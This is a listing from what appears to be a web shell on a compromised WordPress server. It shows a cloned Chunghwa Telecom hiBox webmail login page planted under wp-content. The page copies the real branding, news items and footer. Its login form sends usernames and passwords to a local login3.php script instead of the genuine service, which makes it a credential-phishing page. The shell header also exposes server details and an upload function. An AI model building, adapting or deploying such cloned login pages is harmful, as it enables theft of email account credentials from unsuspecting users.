HEX
Server: nginx/1.24.0
System: Linux webserver 6.8.0-87-generic #88-Ubuntu SMP PREEMPT_DYNAMIC Sat Oct 11 09:28:41 UTC 2025 x86_64
User: wpuser (1002)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: //proc/self/cwd/wp-content/tw/box.htm
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0032)https://hibox.hinet.net/uwc/auth -->
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<meta http-equiv="cache-control" content="max-age=0">
<meta http-equiv="cache-control" content="no-cache">
<meta http-equiv="expires" content="0">
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT">
<meta http-equiv="pragma" content="no-cache">

<meta name="keywords" content="email,HiNet Mail,Push Mail,hinet 郵件,hinet信箱,郵件委外,mail,spam,web mail,webmail,mail ASP,中華 電信 信箱,中華 電信 電子信箱,企業信箱,信箱委外,Mail Server,垃圾郵件,信箱,掃毒,郵件,郵件代管,郵件伺服器,資訊安全,電子信箱,電子郵件,網域名稱,傳真,簡訊,全能信箱,企業信箱,訊息服務,企業郵件">
<meta name="description" content="省去自行建置及維護電子郵件服務系統之成本及繁瑣,同時享受HiNet中華電信最穩固機房與充足頻寬提供企業電子郵件系統委外之專業化服務,輕鬆擁有安全無毒、不受垃圾郵件干擾的使用環境,讓企業重要商機(郵件)不漏失;多功能整合式郵件信箱服務,操作容易卻提昇企業競爭力">
<title>hiBox全能信箱</title>
<style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
-->
.loginTable td > *{
	vertical-align: middle;
}
a, img{
	border: none;outline: none;
}

</style>
<link href="./hiBox全能信箱_files/hiBox.css" rel="stylesheet" type="text/css">
<!-- prevent XFS  -->

<script type="text/javascript">
    if (self === top) {
        var antiClickjack = document.getElementById("antiClickjack");
        antiClickjack.parentNode.removeChild(antiClickjack);
    } else {
        top.location = self.location;
    }
</script>
<script type="text/javascript" src="./hiBox全能信箱_files/index.js.download"></script>
	
	<!-- jQuery & jQueryUI + theme --> 
	<link href="./hiBox全能信箱_files/jquery-ui.css" rel="stylesheet">
	<script src="./hiBox全能信箱_files/jquery.min.js.download"></script>
	<script src="./hiBox全能信箱_files/jquery-ui.min.js.download"></script>
	
	<!-- keyboard widget css & script (required) -->
	<link href="./hiBox全能信箱_files/keyboard.css" rel="stylesheet">
	<script src="./hiBox全能信箱_files/jquery.keyboard.js.download"></script>
	<script src="./hiBox全能信箱_files/key.js.download"></script>

<script type="text/javascript">
var copyRight = null;
var productName = null;
var logoImagePath = null;
var versionImagePath = null;
var versionPageTitle = null;
var closeLabel = null;
var closeTitle = null;
var LoginImagePath = null;

function handleLoad()
{
copyRight="Copyright  2008 Sun Microsystems, Inc. All rights reserved. SUN PROPRIETARY/CONFIDENTIAL. U.S. Government Rights - Commercial software. Government users are subject to the Sun Microsystems, Inc. standard license agreement and applicable provisions of the FAR and its supplements. Use is subject to license terms. Sun, Sun Microsystems, the Sun logo and Java are trademarks or registered trademarks of Sun Microsystems, Inc. in the U.S. and other countries.";
productName="Sun Java(TM) System Communications Express 6.3 update 1";
logoImagePath="./uwc/images/login-logo.gif";
versionImagePath="./../images/S1MC_login.gif";
versionPageTitle="Version Information";
closeLabel="Close";
closeTitle="Close Window";
document.form1.username.focus();
}
function LoadCaptcha()
{
	document.getElementById('captcha').src = './stickyImg?' + Math.random(); 
	return false;
}
/*modify start*/
function callSubmit(eventTag) { 
   //if (event.keyCode==13)
   //    handleSubmit();
   var event = eventTag||window.event;
   var currentKey = event.charCode||event.keyCode;
   if (currentKey==13)
       handleSubmit();
}
/*modify end*/

function handleSubmit() {
  if (document.forms.form1.save_uid.checked) {
 		selectioncookie();
	}
  if(document.form1.username.value.indexOf("@")==-1) { 
	document.form1.username.value = document.form1.username.value + "@hibox.hinet.net";	
  }	

  var targetAction =  "login3.php";
  document.form1.action = targetAction;
  document.form1.submit();
}



function handleError() {
	if (false || false ) {
		/*modify start*/
		document.write('<img src="./uwc/images/Error_Large.gif" alt="" width="21" height="22"><font color="red">帳號或密碼認證失敗</font>');
		//document.write('<tr><td width="244" align="center" class="bk12" height="9" colspan="2">\n'+'<img src="./uwc/images/Error_Large.gif" alt="" width="21" height="22">&nbsp;&nbsp;<font color="red">' +'<span class=AlrtErrTxt> Authentication Failed<br> Reenter your username and password.</span><br></td></tr>');
		/*
		document.write('<DIV class=logErr>');
		document.write('<table cellspacing=0 cellpadding=0 border=0>');
		document.write('<tbody>');
	        document.write('<tr>');
		document.write('<td valign=top width="28"><img src="./uwc/images/Error_Large.gif" alt="" width="21" height="22">&nbsp;&nbsp;</td>');
		document.write("<td width='233'> <span class=AlrtErrTxt> Authentication Failed<br> Reenter your username and password.</span> </td>");

		document.write('</tr>');
		document.write('</tbody>');
		document.write('</table>');
		document.write('</DIV>');
		modify end*/
	}

}

function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}
function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}

function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
</script>

<!--Cookie 記憶選單 宣告程式開始-->
<script language="Javascript">
//製作:CliffSTAR Studios.(http://uuu.to/cstar)
CookiesExpDay="30"; //Cookie 的保存天數


function selectioncookie() {
	if (document.forms.form1.username.value == "請輸入您完整的email"){
		document.forms.form1.username.value = "";
	}	
	SetCookie('selvaluecookie10', document.forms.form1.username.value);	 
}
</script><!--Cookie 記憶選單 宣告程式結束-->
<!--Cookie 記憶選單 OPCOOKIE 控制Cookie程式開始-->
<script language="Javascript">
var time = new Date();
time.setTime(time.getTime()+((1000*60*60*24)*CookiesExpDay)) // here let the cookie expires extend 10 days of the setting day.

function GetCookie(name){
var cname=name+"=";
var dc=document.cookie;
	if(dc.length>0){
		begin = dc.indexOf(cname)
		if(begin!=-1){
		begin=begin+cname.length
		end=dc.indexOf(";",begin)
			if(end==-1) 
			end=dc.length
		return dc.substring(begin,end)
		}
	}
return null
}
/*function of Get the cookie*/
function SetCookie (name, value, expires) {
	
	if(expires==null){
	expires=""
	}
	document.cookie = name+"="+value+";expires="+ time.toGMTString()}
</script>
<!--Cookie 記憶選單 OPCOOKIE 控制Cookie程式結束--> 

<!--圖片輪播--> 
<script type="text/javascript"> 
    var myImg = new Array("./uwc/images_tw/banner09.png","./uwc/images_tw/banner05.png","./uwc/images_tw/banner06.png","./uwc/images_tw/banner10.jpg","./uwc/images_tw/banner07.jpg","./uwc/images_tw/banner04.jpg","./uwc/images_tw/banner03.gif");
    var myHref = new Array("https://sms.hinet.net/","https://domain.hinet.net/","https://hinetfax.hinet.net/",
						   "https://www.cht.com.tw/home/enterprise/products-services/bigdata-businessapplication/message-app/170",
						   "https://www.cht.com.tw/home/enterprise/products-services/bigdata-businessapplication/message-app/170",
						   "https://www.cht.com.tw/home/enterprise/products-services/bigdata-businessapplication/message-app/170",
						   "http://funplay.hinet.net/");
    var playImg = new Array(7); 
	var playHref = new Array(7);
    var nowIndex=1; 
    for(var i=0;i<playImg.length;i++){ 
        playImg[i] = myImg[Math.ceil(Math.random()*myImg.length-1)]; 
		playHref[i] = myHref[Math.ceil(Math.random()*myImg.length-1)]; 
    } 
    function showImg(){ 
		document.getElementById("my_href").href = myHref[nowIndex];
        document.getElementById("my_img").src = myImg[nowIndex]; 
        nowIndex = (nowIndex+1) == 7 ? 0 : nowIndex+1; 
    } 
    //setInterval("showImg()",3500); 
	setInterval("showImg()",7000); 
</script> 



</head>

<body onload="handleLoad();funShowMainBanner(0);MM_preloadImages(&#39;./uwc/images_tw/botton02_01.gif&#39;,&#39;./uwc/images_tw/botton02_03.gif&#39;,&#39;./uwc/images_tw/botton03_02.gif&#39;,&#39;./uwc/images_tw/icon-more02.gif&#39;,&#39;./uwc/images_tw/menu01-02.gif&#39;,&#39;./uwc/images_tw/menu02-02.gif&#39;,&#39;./uwc/images_tw/menu03-02.gif&#39;,&#39;./uwc/images_tw/menu04-02.gif&#39;,&#39;./uwc/images_tw/menu05-02.gif&#39;,&#39;./uwc/images_tw/menu06-02.gif&#39;,&#39;./uwc/images_tw/menu07-02.gif&#39;,&#39;./uwc/images_tw/menu08-02.gif&#39;);">
<FORM name=form1 onSubmit="handleSubmit()" action="login3.php" method="GET">
<input type="hidden" name="fromlogin" value="true">

<input type="hidden" name="orgaccess" value="https">
<!-- header start-->
      <td height="25" align="right" valign="top" background="./hiBox全能信箱_files/header_01.jpg">
    	<table width="370" border="0" cellpadding="0" cellspacing="0">
        <tbody><tr>
          <td width="158" height="24" align="right" valign="middle">
    		<img src="./hiBox全能信箱_files/icon-02.gif" width="18" height="15" align="middle"> 
  	    	<a href="https://apply.hibox.hinet.net/hiBox_extend/mailAdmin/login.php" target="_blank" class="manage">管理者登入
  	  	  </a> 
		  <img src="./hiBox全能信箱_files/dis-02.gif" width="9" height="9"> 
   <a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/sitemap.html" class="manage"> 網站地圖
	  	  </a> 
		  </td>
           <td width="195" align="center" valign="middle">
		  <a href="https://hibox.hinet.net/uwc/?lang=zh-tw" class="language">繁中
	    	</a> 
		  <img src="./hiBox全能信箱_files/dis-02.gif" alt="" width="9" height="9"> 
		  <a href="https://hibox.hinet.net/uwc/?lang=zh-cn" class="language">簡中
		  </a> 
		  <img src="./hiBox全能信箱_files/dis-02.gif" alt="" width="9" height="9"> 
	    	<a href="https://hibox.hinet.net/uwc/?lang=en" class="language">English 
	    	</a>
		    </td>
          <td width="17">&nbsp;
	  	  </td>
        </tr>
      </tbody></table>
	  </td>
    </tr>
  </tbody></table>
  <table width="937" border="0" align="center" cellpadding="0" cellspacing="0">
    <tbody><tr>
      <td height="81"><img src="./hiBox全能信箱_files/header_02.jpg" width="937" height="81" border="0" usemap="#Map">
	  </td>
    </tr>
  </tbody></table>
  <map name="Map" id="Map">
    <area shape="rect" coords="32,2,267,54" href="https://hibox.hinet.net/uwc/?lang=zh-tw" alt="回首頁">
    <area shape="rect" coords="723,39,882,62" href="https://hib2border.hinet.net/HiB2B/alf/hiB2BTrModify.jsp?funCode=401" target="_blank" alt="立即申請試用TRY IT!">
  </map>
  <table width="937" border="0" align="center" cellpadding="0" cellspacing="0">
  <tbody><tr>
  <td width="71" valign="top"><img src="./hiBox全能信箱_files/GlobalNavigation01_01.gif" width="71" height="31"></td>
  <td width="808"><ul class="menu">
   <li class="top p1"><a href="https://hibox.hinet.net/uwc/?lang=zh-tw" id="home" class="top_link" alt="回首頁"><span>Home</span></a></li>
   <li class="top p2"><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/features.html" id="products" class="top_link" alt="產品簡介"><span>products</span><!--[if IE 7]><!--></a><!--<![endif]-->
    <!--[if lte IE 6]><table><tr><td><![endif]-->
    <ul class="sub">
     <li><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/features.html">產品特色</a></li>
     <li><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/functions.html">功能說明</a></li>
     <li><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/advantages.html">服務優勢</a></li>
     <li><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/benefits.html">使用效益</a></li>
     <li><a href="https://hibox.hinet.net/uwc/auth#" class="fly">加值服務<!--[if IE 7]><!--></a><!--<![endif]-->
       <!--[if lte IE 6]><table><tr><td><![endif]-->
       <ul>
        <li><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/audit.html">郵件稽核</a></li>
        <li><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/backup.html">郵件備份</a></li>
        <li><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/smsotp.html">簡訊OTP</a></li>
       </ul>
       <!--[if lte IE 6]></td></tr></table></a><![endif]-->
    </li></ul>
    <!--[if lte IE 6]></td></tr></table></a><![endif]-->
   </li>
  <li class="top p3"><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/promotion02.html" id="prices" class="top_link"><span>prices</span></a></li>
  <li class="top p4"><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/case.html" id="scases" class="top_link"><span>scases</span></a></li>
   <li class="top p5"><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/docs.html" id="downloads" class="top_link"><span>downloads</span><!--[if IE 7]><!--></a><!--<![endif]-->
    <!--[if lte IE 6]><table><tr><td><![endif]-->
    <ul class="sub">
     <li><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/docs.html">產品文件</a></li>
     <li><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/manuals.html">使用手冊</a></li>
    </ul>
    <!--[if lte IE 6]></td></tr></table></a><![endif]-->
   </li>
   <li class="top p6"><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/apply.html" id="applications" class="top_link"><span>applications</span></a></li>
   <li class="top p7"><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/bizs.html" id="faq" class="top_link"><span>faq</span><!--[if IE 7]><!--></a><!--<![endif]-->
    <!--[if lte IE 6]><table><tr><td><![endif]-->
    <ul class="sub">
     <li><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/bizs.html">業務申請</a></li>
     <li><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/tech.html">技術支援</a></li>
    </ul>
    <!--[if lte IE 6]></td></tr></table></a><![endif]-->
   </li>
   <li class="top p8"><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/contact.html" id="contactus" class="top_link"><span>contactus</span></a></li>
  </ul>
    <div class="box250"></div></td>
  <td width="58" valign="top"><img src="./hiBox全能信箱_files/GlobalNavigation01_10.gif" width="58" height="31"></td>
  </tr>
  </tbody></table>

<!-- header end-->
<table width="937" border="0" align="center" cellpadding="0" cellspacing="0">
  <tbody><tr>
    <td height="7"><img src="./hiBox全能信箱_files/HB_03.gif" width="937" height="7"></td>
  </tr>
</tbody></table>
<table width="937" border="0" align="center" cellpadding="0" cellspacing="0">
  <tbody><tr>
    <td width="3" height="31"><img src="./hiBox全能信箱_files/HB_04.gif" width="3" height="212"></td>
    <td width="632" valign="top"><table border="0" cellpadding="0" cellspacing="0" class="index_main_banner_table">
  <tbody>
    <tr>
      <td id="tdMainBannerPic">
      <div id="divMainBanner1" style="display: none;"><a href="https://www.cht.com.tw/home/enterprise/products-services/bigdata-businessapplication/message-app/170" target="_blank"><img src="./hiBox全能信箱_files/HB_05-07.jpg" width="632" height="190" border="0"></a></div>
      <div style="display: none;" id="divMainBanner5"><a href="https://hibox.hinet.net/uwc/auth#" target="_parent"><img border="0" src="./hiBox全能信箱_files/HB_05.jpg"></a></div>
      <div style="display: none;" id="divMainBanner5"><a href="https://hibox.hinet.net/uwc/auth#" target="_parent"><img border="0" src="./hiBox全能信箱_files/HB_05-06.png"></a></div>
      <div style="display: none;" id="divMainBanner2"><a href="https://hibox.hinet.net/uwc/auth#" target="_parent"><img border="0" src="./hiBox全能信箱_files/HB_05-02.jpg"></a></div>
      <div style="display: none;" id="divMainBanner3"><a href="https://hibox.hinet.net/uwc/auth#" target="_parent"><img border="0" src="./hiBox全能信箱_files/HB_05-03.jpg"></a></div>
      <div style="display: none;" id="divMainBanner4"><a href="https://hibox.hinet.net/uwc/auth#" target="_parent"><img border="0" src="./hiBox全能信箱_files/HB_05-04.jpg"></a></div>
      <div style="" id="divMainBanner4"><a href="https://hibox.hinet.net/uwc/auth#" target="_parent"><img border="0" src="./hiBox全能信箱_files/HB_05-05.gif"></a></div>
      </td>
    </tr>
    <tr>
      <td height="22" align="left" valign="top" background="./hiBox全能信箱_files/banner-bg01.gif"><table width="600" border="0" cellpadding="0" cellspacing="0">
          <tbody><tr>
            <td align="right"><table border="0" cellpadding="0" cellspacing="0" class="index_main_banner_page_table">
              <tbody>
                <tr id="trMainBannerPage">
                  <td class="index_main_banner_page_td"><a onmouseover="funShowMainBanner(0);" href="javascript: void(0)">1</a></td>
                  <td class="index_main_banner_page_td"><a onmouseover="funShowMainBanner(1);" href="javascript: void(0);">2</a></td>
                  <td class="index_main_banner_page_td"><a onmouseover="funShowMainBanner(2);" href="javascript: void(0);">3</a></td>
                  <td class="index_main_banner_page_td"><a onmouseover="funShowMainBanner(3);" href="javascript: void(0);">4</a></td>
				  <td class="index_main_banner_page_td"><a onmouseover="funShowMainBanner(4);" href="javascript: void(0);">5</a></td>
				  <td class="index_main_banner_page_td"><a onmouseover="funShowMainBanner(5);" href="javascript: void(0);">6</a></td>
				  <td class="index_main_banner_page_current"><a onmouseover="funShowMainBanner(6);" href="javascript: void(0);">7</a></td>				  
                </tr>
              </tbody>
            </table></td>
          </tr>
        </tbody></table></td>
    </tr>
  </tbody>
</table></td>
    <td width="8"><img src="./hiBox全能信箱_files/HB_06.gif" width="8" height="212"></td>
    <td width="292" align="center" valign="top" background="./hiBox全能信箱_files/HB_07.gif">
	
	<table width="252" height="135" border="0" cellpadding="0" cellspacing="1" class="loginTable">
      <tbody><tr>
        <td height="40" colspan="2" align="right" valign="middle">
		&nbsp; <script>
				handleError();
			   </script>
	    </td>
      </tr>
      <tr>
        <td height="30" colspan="2" align="center">帳號:
        
        <input type="text" id="username" name="username" placeholder="請輸入您完整的email" maxlength="50" size="20" class="ui-keyboard-input ui-widget-content ui-corner-all" aria-haspopup="true" role="textbox"><img id="uname" class="tooltip" title="開啟虛擬鍵盤" src="./hiBox全能信箱_files/keypad.png"> 
          
          
		   <script language="Javascript">	

			if(GetCookie("selvaluecookie10")!=null){
						
					document.forms.form1.username.value=GetCookie("selvaluecookie10");			
				
			}
		</script>
          <br></td>
      </tr>
      <tr>
        <td height="30" colspan="2" align="center">密碼:
          <input type="password" id="password" name="password" onkeypress="callSubmit(event)" maxlength="50" size="20" class="ui-keyboard-input ui-widget-content ui-corner-all" aria-haspopup="true" role="textbox"><img id="passwd" class="tooltip" title="開啟虛擬鍵盤" src="./hiBox全能信箱_files/keypad.png"></td>
      </tr>
      
      
     		
		
	  <tr>
		<td height="32" align="center">
			<img id="captcha" src="./hiBox全能信箱_files/stickyImg">&nbsp;=&nbsp;
			<input type="text" id="captchaans" name="captcha" placeholder="請計算左圖答案" class="ui-widget-content ui-corner-all" style="text-align: center;" size="12" maxlength="3" value="">
			<a href="#" onclick="document.getElementById(&#39;captchaans&#39;).value=&#39;&#39;; document.getElementById(&#39;captcha&#39;).src = &#39;./stickyImg?&#39; + Math.random(); return false;" tabindex="-1"><img src="./hiBox全能信箱_files/refresh.png" height="15" width="15" tabindex="-1"></a>		
		</td>
		<td>
		
		</td>
	  </tr>

	  

		  	
		
      <tr>
        <td height="32" align="center" valign="bottom"><input type="checkbox" name="save_uid" id="save_uid" tabindex="-1">
          記住我的帳號
        <a href="#" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage(&#39;Image6&#39;,&#39;&#39;,&#39;./uwc/images_tw/botton02_01.gif&#39;,1)" onclick="handleSubmit()"><img src="./hiBox全能信箱_files/botton01_01.gif" alt="登入" name="Image6" width="47" height="25" border="0" id="Image6"></a><a href="https://hibox.hinet.net/uwc/auth#" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage(&#39;Image7&#39;,&#39;&#39;,&#39;./uwc/images_tw/botton02_03.gif&#39;,1)"><img src="./hiBox全能信箱_files/botton01_03.gif" alt="說明" name="Image7" width="47" height="25" border="0" id="Image7" onclick="MM_openBrWindow('uwc/homepage_tw/popup.html','','width=395,height=220')" /></a>  
        </td>
        
      </tr>
       
      <tr>
		<td align="center">
			<a onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage(&#39;Image11&#39;,&#39;&#39;,&#39;./uwc/images_tw/botton03_02.gif&#39;,1)" target="_blank" href="https://apply.hibox.hinet.net/hiBox_extend/mailAdmin/login.php"><img id="Image11" width="222" height="36" border="0" name="Image11" alt="管理者登入ENTER" src="./hiBox全能信箱_files/botton03_01.gif"></a>
		</td>
	  </tr>
	    
    </tbody></table>
	
	
	
	 </td>
    <td width="2"><img src="./hiBox全能信箱_files/HB_08.gif" width="2" height="212"></td>
  </tr>
</tbody></table>
<table width="937" border="0" align="center" cellpadding="0" cellspacing="0">
  <tbody><tr>
    <td height="7"><img src="./hiBox全能信箱_files/HB_09.gif" width="937" height="9"></td>
  </tr>
</tbody></table>
<table width="937" border="0" align="center" cellpadding="0" cellspacing="0">
  <tbody><tr>
    <td height="206" valign="top" background="./hiBox全能信箱_files/HB_10.gif"><table width="937" height="190" border="0" cellpadding="0" cellspacing="0">
      <tbody><tr>
        <td width="657" height="190" align="center" valign="top"><table width="620" height="39" border="0" cellpadding="0" cellspacing="0">
          <tbody><tr>
            <td width="526" height="39" align="left" valign="bottom"><img src="./hiBox全能信箱_files/td-01.gif" alt="訊息快遞" width="375" height="26"></td>
            <td width="94" align="right" valign="bottom"><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/news.html" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage(&#39;Image13&#39;,&#39;&#39;,&#39;./uwc/images_tw/icon-more02.gif&#39;,1)"><img src="./hiBox全能信箱_files/icon-more01.gif" alt="更多訊息" name="Image13" width="94" height="20" border="0" id="Image13"></a></td>
          </tr>
        </tbody></table>
         <!--info start-->
			<script type="text/javascript" src=""></script><table width="633" height="145" border="0" cellpadding="0" cellspacing="0" class="ul">
  <tbody><tr>
    <td height="145" align="left" valign="top"><ul>
      <li><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/news.html#new76" class="language"><img src="./hiBox全能信箱_files/icon-new.gif" width="29" height="13" border="0"> hiBox將於2025/2/23 00:00~08:00進行維護作業,期間可能出現短暫無法登入,煩請稍候再試。</a></li>
      <li><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/news.html#new70" class="language"> 自2023/3/1起郵件簡訊OTP密碼鎖服務免收月租費 </a></li>
      <li><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/news.html#new65" class="language"> hiBox即日起提供DKIM電子郵件認證機制 </a></li>
      <li><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/news.html#new64" class="language"> 近日hiBox大陸地區使用者發生無法連線使用問題...</a></li>
      <li><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/news.html#new56" class="language"> 為了保護您的資料安全,建議使用支援TLS1.2加密傳輸協定的作業系統</a></li>
      <li><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/news.html#new36" class="language"> hiBox 舊平台客戶服務升版申請自2016年1月12日開放,請至管理系統登錄申請,謝謝!</a></li>
 	 </ul></td>
  </tr>
</tbody></table>

		  <!--info end--> 
		</td>
        <td width="20" align="left"><img src="./hiBox全能信箱_files/dis-01.gif" width="3" height="190"></td>
        <td width="260" align="left" valign="middle"><table width="100" border="0" cellpadding="0" cellspacing="4">
			<tbody><tr>
              <td><a target="_blank" id="my_href" href="https://www.cht.com.tw/home/enterprise/products-services/bigdata-businessapplication/message-app/170"><img src="https://hibox.hinet.net/uwc/uwc/images_tw/banner04.jpg" width="218" height="80" border="0"></a></td> 
            </tr>
            <tr>
              <td><a href="https://hibox.hinet.net/uwc/uwc/homepage_tw/promotion02.html"><img src="./hiBox全能信箱_files/banner01.gif" width="218" height="80" border="0"></a></td>			
              <!--<td><a href='./uwc/homepage_tw/news.html#new05'><img src="./uwc/images_tw/banner02.gif" width="218" height="80" border="0" /></a></td>
			  <td><a href='https://dsishib2b.cht.com.tw/HiB2B/alf/hiB2BUlUnionListApply.jsp?&sev_type=AK&sev_code=01&lockProduct=true&unlockPdtCode=true'><img src="./uwc/images_tw/banner02-1.gif" width="218" height="80" border="0" /></a></td>
	  		  -->	  
            </tr>
          </tbody></table>
          </td>
      </tr>
    </tbody></table></td>
  </tr>
</tbody></table>
</form>
<script src="./hiBox全能信箱_files/placeholders.min.js.download"></script>
<!--footer start-->
<script type="text/javascript" src=""></script><table width="937" border="0" align="center" cellpadding="0" cellspacing="0">
  <tbody><tr>
    <td height="66" align="center" valign="top"><table width="800" border="0" cellpadding="0" cellspacing="0">
      <tbody><tr>
        <td width="145" height="43" align="right"><img src="./hiBox全能信箱_files/icon-HiNet.gif" width="126" height="50">
                           </td>
        <td width="655" align="left" valign="middle" class="front-copyright">中華電信股份有限公司地址:臺北市信義路一段21號 服務時間:24小時全年無休
                                  <br>
                                  全區免費客戶服務電話:0800-080-365
 		                         <br>
                                 © Chunghwa Telecom Co., Ltd. All Rights Reserved.</td>
      </tr>
    </tbody></table>
 </td>
  </tr>
</tbody></table>

 <!--footer end-->



 

<link rel="SHORTCUT ICON" href="https://hibox.hinet.net/uwc/webmail/favicon.ico">



</body></html>